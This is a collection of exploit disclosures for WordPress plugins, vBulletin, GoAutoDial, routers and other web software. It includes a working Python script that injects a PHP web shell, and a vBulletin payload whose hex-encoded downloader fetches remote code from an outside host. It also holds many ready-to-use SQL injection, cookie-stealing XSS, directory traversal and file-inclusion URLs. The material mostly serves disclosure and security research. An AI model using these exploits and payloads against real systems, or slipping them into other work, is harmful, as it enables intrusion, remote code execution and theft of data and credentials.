[+] Calculated Fields Form Wordpress Plugin <= 1.0.10 - Remote SQL Injection Vulnerability
[+] Author: Ibrahim Raafat
[+] Twitter: https://twitter.com/RaafatSEC
[+] Plugin: https://wordpress.org/plugins/calculated-fields-form/

[+] TimeLine
	[-] Feb 6 2015, The vulnerabilities reported
	[-] Feb 7 2015, Response and Confirming the vulnerabilities 
	[-] Feb 8 2015, First fixing released to version 1.0.11
	[-] Feb 17 2015, CSRF protection added to version 1.0.12
	[-] March 1 2015, Public Disclosure

[+] Download: https://downloads.wordpress.org/plugin/calculated-fields-form.1.0.10.zip

[+] Description:
	There are sql injection vulnerabilities in Calculated Fields Form Plugin
	which could allow the attacker to execute sql queries into database

[+] Vulnerable Code: [Red]
https://plugins.trac.wordpress.org/changeset/1084937/calculated-fields-form

[+] POC: 

/wp-admin/options-general.php?page=cp_calculated_fields_form&u=2 and 1=1&name=InsertText 
/wp-admin/options-general.php?page=cp_calculated_fields_form&u=2 or 1=1&name=InsertText // Will update all
/wp-admin/options-general.php?page=cp_calculated_fields_form&c=21 and 1=1 
/wp-admin/options-general.php?page=cp_calculated_fields_form&d=3 and 1=2  Delete

These queries are execute without any csrf protection, The attacker can use this csrf vulnerability to execute queries in the sql by sending malicious page to the logged in admin

[+] Impact: Attacker can use this vulnerabilities to update admin password

[+] Recommendation: If you are using 1.0.12 or less, Upgrade the plugin ASAP

[+] @lnxg33k Enta Sa3eed Bahlol?
            
# Title : GoAutoDial CE 2.0 Shell Upload
# Date : 28/02/2015 
# Author : R-73eN
# Software : GoAutoDial CE 2.0
# Tested : On Linux vicisrv.loc 2.6.18-238.9.1.el5.goPAE #1  GoAutoDial CE 2.0

import socket
import sys
banner = "\n\n"
banner +="  ___        __        ____                 _    _  \n"  
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
print banner
CRLF = "\r\n"
def checkvuln():
	command = "uname"
	evil = path + '/manager_send.php?enable_sipsak_messages=1&allow_sipsak_messages=1&protocol=sip&ACTION=OriginateVDRelogin&session_name=AAAAAAAAAAAA&server_ip=%27%20OR%20%271%27%20%3D%20%271&extension=%3B' + command + '%3B&user=' + user + '&pass=' + password
	s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect((host,80))
	evilREQ = 'GET ' + evil + ' HTTP/1.1' + CRLF + 'Host: ' + host + CRLF + 'User-Agent: Infogen-AL' + CRLF + CRLF + CRLF
	s.send(evilREQ)
	a = s.recv(1024)
	if(a.find("HTTP/1.1 200 OK") != -1 and a.find("Linux") != -1):
		print '[ + ] Server Is vulnerable [ + ]\n'
		shellupload()
	else: 
		print '[ - ] Server is not vulnerable [ - ]\n'
	s.close()


def shellupload():
	command = "echo 'Infogen-AL<br><?php echo system($_GET['cmd']);?>' > /var/www/html/infogen.php"
	#command = "rm /var/www/html/123.pl;rm /var/www/html/TEST.perl"
	command = command.replace(" ", "%20")
	evil = path + '/manager_send.php?enable_sipsak_messages=1&allow_sipsak_messages=1&protocol=sip&ACTION=OriginateVDRelogin&session_name=AAAAAAAAAAAA&server_ip=%27%20OR%20%271%27%20%3D%20%271&extension=%3B' + command + '%3B&user=' + user + '&pass=' + password
	s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect((host,80))
	evilREQ = 'GET ' + evil + ' HTTP/1.1' + CRLF + 'Host: ' + host + CRLF + 'User-Agent: Infogen-AL' + CRLF + CRLF + CRLF
	s.send(evilREQ)
	a = s.recv(1024)
	if(a.find("HTTP/1.1 200 OK") != -1 and a.find("Invalid") == -1):
		print '[ + ] Shell uploaded successfully [ + ]\n'
		print '[ + ] http://' + host + '/infogen.php [ + ]\n'
	else:
		print '[ - ] Shell upload failed.... [ - ]'
	s.close()

if(len(sys.argv) < 4):
	print '\n Usage : exploit.py 127.0.0.1 /goautodial-agent/ agentuser agentpassword\n'
else:
	host = sys.argv[1]
	path = sys.argv[2]
	user = sys.argv[3]
	password = sys.argv[4]
	checkvuln()
	print 'Visit Us : http://infogen.al/'
            
#################################################################################################################
[+] Exploit Title: vBulletin 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability
[+] Discovered By: Dariush Nasirpour (Net.Edit0r)
[+] My Homepage: black-hg.org / nasirpour.info
[+] Date: [2015 27 February]
[+] Vendor Homepage: vBulletin.com
[+] Tested on: [vBulletin 4.2.2]
[+] Greeting : Ali Razmjoo - Ehsan Nezami - Arash Shams - Ramin Shahkar and all my freinds ( #bhg )
#################################################################################################################
Remote Code Injection:
+++++++++++++++++++++++++
1) You Must Register In The vBulletin http://server/register.php example:[blackhat]

2) go to your user profile example: [http://server/members/blackhat.html]

3) post something in visitor message and record post data with live http header

[example] : message_backup=&message=For-Test-Sample&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=
1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=

4- change message to anything "For-Test-Sample" => "ALEEEEEEEEX"  [because vBulletin don't let you send same comment in a time]

[Now post this with hackbar:]

URL:  http://server/visitormessage.php?do=message

[Post data]
message_backup=&message=ALEEEEEEEEX&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=
1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=

[And referrer data:] 
PoC : http://server/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked")}}]

[Example referrer data:] > upload downloader.php and s.php
PoC : http://server/members/g3n3rall.html?a=$stylevar%5b$%7b$%7bfile_put_contents(
"downloader.php","\x3C\x3F\x70\x68\x70\x0D\x0A\x24\x68\x6F\x6D\x65\x70\x61\x67\x65\x20\x3D\x20\x66\x69\x6C\x65\x5F\x67\x65\x74\x5F\x63\x6F\x6E\x74\x65\x6E\x74\x73\x28\x27\x68\x74\x74\x70\x3A\x2F\x2F\x70\x61\x69\x65\x6E\x63\x68\x61\x74\x2E\x63\x6F\x6D\x2F\x64\x2F\x64\x72\x2E\x74\x78\x74\x27\x29\x3B\x0D\x0A\x24\x66\x20\x3D\x20\x66\x6F\x70\x65\x6E\x28\x27\x73\x2E\x70\x68\x70\x27\x2C\x27\x77\x27\x29\x3B\x0D\x0A\x66\x77\x72\x69\x74\x65\x28\x24\x66\x2C\x24\x68\x6F\x6D\x65\x70\x61\x67\x65\x29\x3B\x0D\x0A\x3F\x3E")}}]

5- Open hackbar and tamper it with taper data:
referrer data has been URL encoded by browser , you have to replace this again with tamper data: http://server/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked")}}]

and submit request.

################################################################################################################
            
source: https://www.securityfocus.com/bid/50096/info

The Pretty Link plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Pretty Link Plugin 1.4.56 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-content/plugins/pretty-link/classes/views/prli-clicks/head.php?min_date=%3Cscript%3Ealert%28d ocument.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/pretty-link/classes/views/prli-dashboard-widget/widget.php?message=%3Cscript% 3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/pretty-link/classes/views/prli-links/form.php?prli_blogurl=%3Cscript%3Ealert% 28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/pretty-link/classes/views/shared/errors.php?errors[]=%3Cscript%3Ealert%28docu ment.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/pretty-link/classes/views/shared/table-nav.php?page_count=2&page_first_re cord=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 
            
source: https://www.securityfocus.com/bid/50108/info

G-WAN is prone to a buffer-overflow vulnerability and a denial-of-service vulnerability.

Remote attackers can exploit these issues to execute arbitrary code in the context of the application or crash the affected application.

G-WAN 2.10.6 is vulnerable; other versions may also be affected. 

while: do echo -e "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n\r\n' 
            
source: https://www.securityfocus.com/bid/50133/info

PROMOTIC is prone to multiple security vulnerabilities.

Exploiting these issues may allow remote attackers to execute arbitrary code within the context of the affected application or disclose sensitive information.

PROMOTIC 8.1.3 is vulnerable; other versions may also be affected. 

http://www.example.com/webdir/..\..\..\..\..\boot.ini
            
source: https://www.securityfocus.com/bid/50141/info

Xenon is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

http://www.example.com/news_detail.php?id=-9+union+select+0,1,2,3,group_concat%28table_name%29,5+from+information_schema.tables

http://www.example.com/viewstory.php?id=-8+and+1=1+union+select+0,1,2,group_concat%28column_name%29,4+from+information_schema.columns+where+table_name=0x7573657273

http://www.example.com/event.php?id=-153+union+select+0,1,2,3,4,5,6,7,8,group_concat%28table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables
            
source: https://www.securityfocus.com/bid/50167/info

asgbookphp is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

http://code.google.com/p/asgbookphp/ asgbookphp 1.9 is vulnerable; other versions may also be affected. 

http://www.example.com/asgbookphp/index.php/>'><ScRiPt>alert(771818860)</ScRiPt> 
            
source: https://www.securityfocus.com/bid/50168/info

Multiple Toshiba e-Studio devices are prone to a security-bypass vulnerability.

Successful exploits will allow attackers to bypass certain security restrictions and gain access in the context of the device. 

http://www.example.com/TopAccess//Administrator/Setup/ScanToFile/List.htm 
            
source: https://www.securityfocus.com/bid/50189/info

Check Point UTM-1 Edge and Safe are prone to multiple security vulnerabilities, including:

1. Multiple cross-site scripting vulnerabilities
2. Multiple HTML-injection vulnerabilities
3. Multiple cross-site request forgery vulnerabilities
4. Multiple URI-redirection vulnerabilities
5. An information-disclosure vulnerability

An attacker may leverage these issues to access sensitive information, redirect an unsuspecting victim to an attacker-controlled site, or steal cookie-based authentication credentials, to perform unauthorized actions in the context of a user's session.

Versions prior to Check Point UTM-1 Edge and Safe 8.2.44 are vulnerable. 

Tested on versions 7.5.48x, 8.1.46x and 8.2.2x.


1) The following demonstrate the reflective XSS flaws:-

a) The Ufp.html page is vulnerable to XSS via the url parameter
It works by submitting a malicious url parameter to the ufp.html page
http://www.example.com/pub/ufp.html?url=";><script>alert(1)</script>&mask=000&swpreview=1

This works with firmware versions 7.5.48x, 8.1.46x and 8.2.2x.

b) The login page is also vulnerable to an XSS via the malicious session cookie
It works by submitting a malicious session cookie to the login page
Cookie: session="><script>alert(1)</script>

c) An authenticated XSS exists within the diagnostics command
http://www.example.com/diag_command.html?sw__ver=blah1&swdata=blah2&sw__custom='";);alert(1);//
(this might need to be submitted twice)


2) The following demonstrate the persistent XSS flaws and XSRF flaws:-

a) The blocked URL warning page is vulnerable to a persistent XSS attack placing any internal users at risk of attack 
when the page is displayed.

First an attacker has to trick the administrator to follow a XSRF attack; the (swsessioncookie) session cookie for 
simplicity sake is shown though JavaScript document.cookie can be used to subvert this protection (see paper).
http://www.example.com/UfpBlock.html?swcaller=UfpBlock.html&swsessioncookie=20KHYp5-oS7rKmS-a4rq4j&swsave=1&ufpblockhttps=0&ufpbreakframe=&backurl=WebRules.html&ufpblockterms=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

Firewall users then visiting blocked sites will have the blocked page displayed and the attack carried out.
http://www.example.com/pub/ufp.html?url=www.blockedUrl.com&mask=000&swpreview=1

b) The Wi-Fi hotspot landing page on Wi-Fi enabled firewalls is also vulnerable, with any user using the Wi-Fi access 
point being at risk.

First an attacker has to trick the administrator to follow a XSRF attack, the (swsessioncookie) session cookie for 
simplicity sake is shown though JavaScript document.cookie can be used to subvert this protection (see paper).
http://www.example.com/HotSpot.html?swcaller=HotSpot.html&swsessioncookie=20KHYp5-oS7rKmS-a4rq4j&swsave=1&hotspotnets=00000000000000000000000000000000000000&hotspotpass=1&hotspotmulti=1&hotspothttps=0&hotspotnet1=0&hotspotnet2=0&hotspotnet3=0&hotspotenf=0&hotspottitle=Welcome+to+My+HotSpot&hotspotterms=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&thotspotpass=on&thotspotmulti=on

Firewall users then visiting the Wi-Fi landing page will then have the attack carried out.
http://www.example.com/pub/hotspot.html?swpreview=1


3) The following demonstrate the (authenticated) offsite redirection flaws:-

a) Enter the following URL to redirect
http://www.example.com/12?swcaller=http://www.procheckup.com

b) Enter the following URL and then press back button.
http://www.example.com/UfpBlock.html?backurl=http://www.procheckup.com

4) The following demonstrate the Information disclosure flaws (no authentication needed)
It was found that the /pub/test.html program disclosed information, regarding the patch level used, licensing and the 
MAC addresses to unauthenticated users.

a) On early firmware versions 5.0.82x, 6.0.72x & 7.0.27x 7.5.48x
Just requesting http:// www.example.com/pub/test.html is sufficient

b) However this no longer worked on versions 8.1.46x & 8.2.26x however adding the URL parameter and a double quote 
bypassed this check
https:// www.example.com/pub/test.html?url="
            
# Title              : Sagem F@st 3304-V2 Directory Traversal Vulnerability
# Vendor             : http://www.sagemcom.com
# Severity           : High
# Tested Router      : Sagem F@st 3304-V2 (3304, other versions may also be affected)
# Date               : 2015-03-01
# Author             : Loudiyi Mohamed
# Contact            : Loudiyi.2010@gmail.com
# Blog               : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603
 
# Vulnerability description:
Sagem Fast is an ADSL Router using a web management interface in order to change configuration
settings. The router is Sagem Fast is an ADSL Router using a web management interface in order
to change configuration settings. 
The web server of the router is vulnerable to directory traversal which allows reading files 
by sending encoded '../' requests.

The vulnerability may be tested with the following command-line:
curl -v4 http://192.168.1.1//../../../../../../../../../../etc/passwd
Or directly from navigateur:
http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fnet%2farp
            
source: https://www.securityfocus.com/bid/50195/info

Site@School is prone to multiple SQL-injection and cross-site scripting vulnerabilities.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

XSS:

http://www.example.com/school/starnet/index.php?option=stats&suboption=&#039;"</style></script><script>alert(document.cookie)</script> 

http://www.example.com/school/starnet/index.php?option=pagemanager&suboption=newsection&site=&#039;"</style></script><script>alert(document.cookie)</script> 

http://www.example.com/school/starnet/index.php?option=modulemanager&modoption=edit&module_number="</style></script><script>alert(document.cookie)</script> 

http://www.example.com/school/starnet/index.php?option=modulemanager&module=&#039;"</style></script><script>alert(document.cookie)</script>

SQL Injection:

http://www.example.com/school/starnet/index.php?option=modulemanager&modoption=edit&module_number=[sql injection]

http://www.example.com/school/starnet/index.php?option=modulemanager&module=[sql injection]
            
# Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ]
# Google Dork: [ Designed by Photocrati ] also [powered by Photocrati]
# Date: [23 / 09 / 2011 ]
# Exploit Author: [ ayastar ]
# Email : dmx-ayastar@hotmail.fr
# Software Link: [ http://www.photocrati.com ]
# Version: [4.X.X]
# Tested on: [ windows 7 ]


--------
details |
=======================================================
Software : photocrati
version : 4.X.X
Risk : High
remote : yes

attacker can do a remote injection in site URL to get some sensitive information .
almost all version are infected by this vunl. 
=======================================================
Exploit code :
http://sitewordpress/wp-content/themes/[photocrati-Path-theme]/ecomm-sizes.php?prod_id=[SQL]

greetz to all muslims and all tryag member's 
:) from morocco
            
# Exploit Title: WordPress: cp-multi-view-calendar.1.1.4  [SQL Injection
vulnerabilities]
# Date: 2015-02-28
# Google Dork: Index of /wordpress/wp-content/plugins/cp-multi-view-calendar
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Software Link:
https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.1.4.zip
# Version: 1.1.5
# Tested on: windows 7 ultimate + sqlmap 0.9. It's php aplication
# OWASP Top10: A1-Injection
# Mitigations: Upgrade to version 1.1.5

Greetz to Christian Uriel Mondragon Zarate

Video demo of unauthenticated user sqli explotation vulnerability :



###################################################################

ADMIN PAGE SQL INJECTION
-------------------------------------------------

http://localhost/wordpress/wp-admin/admin-ajax.php?action=ajax_add_calendar

sqlinjection in post parameter viewid

-------------------------------------------------------------------

http://localhost/wordpress/wp-admin/admin-ajax.php?action=ajax_delete_calendar

sqlinjection in post parameter id


########################################

UNAUTENTICATED SQL INJECTION
-----------------------------------------------------------------

http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1

sql injection in id parameter

-----------------------------------------------------------------------

http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1

datapost viewtype=list&list_order=asc vuln variable list_order


################################################################

CROSSITE SCRIPTING VULNERABILITY
----------------------------------------------------------

http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&weekstartday=alert(12)&f=edit&id=1

crosite script weekstartday parameter

###################################################

==================================

time-line

26-02-2015: vulnerabilities found
27-02-2015: reported to vendor
28-02-2015: release new cp-multi-view-calendar version 1.1.4
28-02-2015: full disclousure

===================================
            
source: https://www.securityfocus.com/bid/50018/info

BuzzScripts BuzzyWall is prone to an information-disclosure vulnerability because it fails to sufficiently validate user-supplied data.

An attacker can exploit this issue to download local files in the context of the webserver process. This may allow the attacker to obtain sensitive information; other attacks are also possible.

BuzzyWall 1.3.2 is vulnerable; other versions may also be affected. 

http://www.example.com/resolute.php?img=config.php 
            
source: https://www.securityfocus.com/bid/50019/info

The 'com_expedition' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?option=com_expedition&task=detail&id=-3235' 
            
source: https://www.securityfocus.com/bid/50039/info
 
GoAhead WebServer is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
 
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
 
GoAhead WebServer 2.18 is vulnerable; other versions may also be affected. 

POST /goform/AddAccessLimit HTTP/1.1
url=<script>alert(1337)</script>&group=test&method=3&ok=OK
            
source: https://www.securityfocus.com/bid/50022/info

Jaws is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

Exploiting these issues may allow a remote attacker to obtain sensitive information or execute arbitrary script code in the context of the Web server process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.

Jaws 0.8.14 is vulnerable; other versions may also be affected. 

http://www.example.com/jaws/libraries/pear/MDB2.php?file_name=[RFI]
http://www.example.com/jaws/libraries/pear/MDB2.php?file_name=[RFI]
http://www.example.com/jaws/libraries/pear/Services/Weather.php?service=[RFI]
http://www.example.com/jaws/libraries/pear/SOAP/Transport.php?transport_include=[RFI]
http://www.example.com/jaws/libraries/pear/Crypt/RSA/MathLoader.php?class_filename=[RFI]